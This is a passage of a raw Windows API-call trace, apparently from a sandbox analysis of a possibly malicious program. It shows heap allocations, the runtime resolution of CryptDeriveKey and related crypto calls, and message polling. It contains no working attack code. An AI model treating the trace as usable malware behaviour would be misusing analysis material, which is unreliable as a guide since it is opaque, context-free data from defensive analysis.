Size=0x8) returned 0x2e55098 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e514f0 [0222.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e514f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0222.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.975] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0222.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0222.976] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa873d0) returned 1 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0222.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0222.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0222.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0222.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0222.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0222.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0222.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0222.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0222.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.980] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0222.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0222.981] CryptDestroyHash (hHash=0xa87310) returned 1 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0222.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 